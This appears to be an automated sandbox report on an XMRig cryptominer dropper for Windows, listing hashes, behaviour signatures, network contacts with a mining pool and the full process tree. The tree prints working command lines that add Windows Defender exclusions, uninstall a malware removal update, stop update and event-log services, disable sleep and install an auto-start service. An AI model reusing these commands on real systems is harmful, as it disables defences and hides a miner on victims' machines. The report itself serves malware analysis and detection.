Analysis

  • max time kernel
    98s
  • max time network
    31s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    02-08-2024 09:07

General

  • Target

    82da016d3d0560b26578da30cc962470N.exe

  • Size

    5.4MB

  • MD5

    82da016d3d0560b26578da30cc962470

  • SHA1

    299ec2a311a5d2984a2d1c710afdfc7ed91f8eed

  • SHA256

    99b86f4472f3b0b1b252e60be361cfbd7e428ee18d36df584446af823ea62b83

  • SHA512

    dc84e2d4395c2f4099a9c665f875728b143782ee649d5983c8b0029052b19f4e4f05d23a2eadc5fedcf867bec43c3def57f9ee44e8c1261a534728931a9a9688

  • SSDEEP

    98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7:xFKoU8O5/b2XViSjX310SeyGc7u7

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Stops running service(s) 4 TTPs
  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • UPX packed file 13 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 11 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe
    "C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    PID:2472
    • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2324
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1368
      • C:\Windows\system32\wusa.exe
        wusa /uninstall /kb:890830 /quiet /norestart
        3⤵
        • Drops file in Windows directory
        PID:2680
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      2⤵
      • Launches sc.exe
      PID:2656
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      2⤵
      • Launches sc.exe
      PID:2760
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      2⤵
      • Launches sc.exe
      PID:2652
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      2⤵
      • Launches sc.exe
      PID:1036
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      2⤵
      • Launches sc.exe
      PID:2984
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:1968
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2564
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2692
    • C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      2⤵
      • Power Settings
      • Suspicious use of AdjustPrivilegeToken
      PID:2696
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "JIOGRCSG"
      2⤵
      • Launches sc.exe
      PID:2572
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"
      2⤵
      • Launches sc.exe
      PID:3020
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      2⤵
      • Launches sc.exe
      PID:3004
    • C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "JIOGRCSG"
      2⤵
      • Launches sc.exe
      PID:988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\82da016d3d0560b26578da30cc962470N.exe"
      2⤵
      • Deletes itself
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\system32\choice.exe
        choice /C Y /N /D Y /T 3
        3⤵
          PID:2844
    • C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe
      C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2628
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1836
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
          • Drops file in Windows directory
          PID:1480
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        2⤵
        • Launches sc.exe
        PID:3016
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        2⤵
        • Launches sc.exe
        PID:1460
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        2⤵
        • Launches sc.exe
        PID:2232
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        2⤵
        • Launches sc.exe
        PID:432
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        2⤵
        • Launches sc.exe
        PID:2592
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1272
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1508
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:1620
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        2⤵
        • Power Settings
        • Suspicious use of AdjustPrivilegeToken
        PID:2060
      • C:\Windows\system32\conhost.exe
        C:\Windows\system32\conhost.exe
        2⤵
          PID:1880
        • C:\Windows\system32\nslookup.exe
          nslookup.exe
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1464

      Network

      • flag-us
        DNS
        us-zephyr.miningocean.org
        nslookup.exe
        Remote address:
        8.8.8.8:53
        Request
        us-zephyr.miningocean.org
        IN A
        Response
        us-zephyr.miningocean.org
        IN A
        15.204.240.197
        us-zephyr.miningocean.org
        IN A
        15.204.244.104
      • 15.204.240.197:5432
        us-zephyr.miningocean.org
        tls
        nslookup.exe
        1.3kB
        4.8kB
        7
        8
      • 8.8.8.8:53
        us-zephyr.miningocean.org
        dns
        nslookup.exe
        71 B
        103 B
        1
        1

        DNS Request

        us-zephyr.miningocean.org

        DNS Response

        15.204.240.197
        15.204.244.104

      MITRE ATT&CK Enterprise v15


      Downloads

      • \ProgramData\zvycwxhpsxqt\lutlgidagtja.exe

        Filesize

        5.4MB

        MD5

        82da016d3d0560b26578da30cc962470

        SHA1

        299ec2a311a5d2984a2d1c710afdfc7ed91f8eed

        SHA256

        99b86f4472f3b0b1b252e60be361cfbd7e428ee18d36df584446af823ea62b83

        SHA512

        dc84e2d4395c2f4099a9c665f875728b143782ee649d5983c8b0029052b19f4e4f05d23a2eadc5fedcf867bec43c3def57f9ee44e8c1261a534728931a9a9688

      • memory/1464-37-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-40-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-39-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-35-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-36-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-31-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-38-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-33-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-32-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-34-0x00000000000B0000-0x00000000000D0000-memory.dmp

        Filesize

        128KB

      • memory/1464-27-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-28-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-29-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1464-30-0x0000000140000000-0x0000000140848000-memory.dmp

        Filesize

        8.3MB

      • memory/1880-20-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-18-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-25-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-19-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-21-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/1880-22-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

      • memory/2324-10-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-11-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-4-0x000007FEF508E000-0x000007FEF508F000-memory.dmp

        Filesize

        4KB

      • memory/2324-9-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-8-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-5-0x000007FEF4DD0000-0x000007FEF576D000-memory.dmp

        Filesize

        9.6MB

      • memory/2324-7-0x0000000001F10000-0x0000000001F18000-memory.dmp

        Filesize

        32KB

      • memory/2324-6-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2856-17-0x0000000000DF0000-0x0000000000DF8000-memory.dmp

        Filesize

        32KB

      • memory/2856-16-0x0000000019B90000-0x0000000019E72000-memory.dmp

        Filesize

        2.9MB
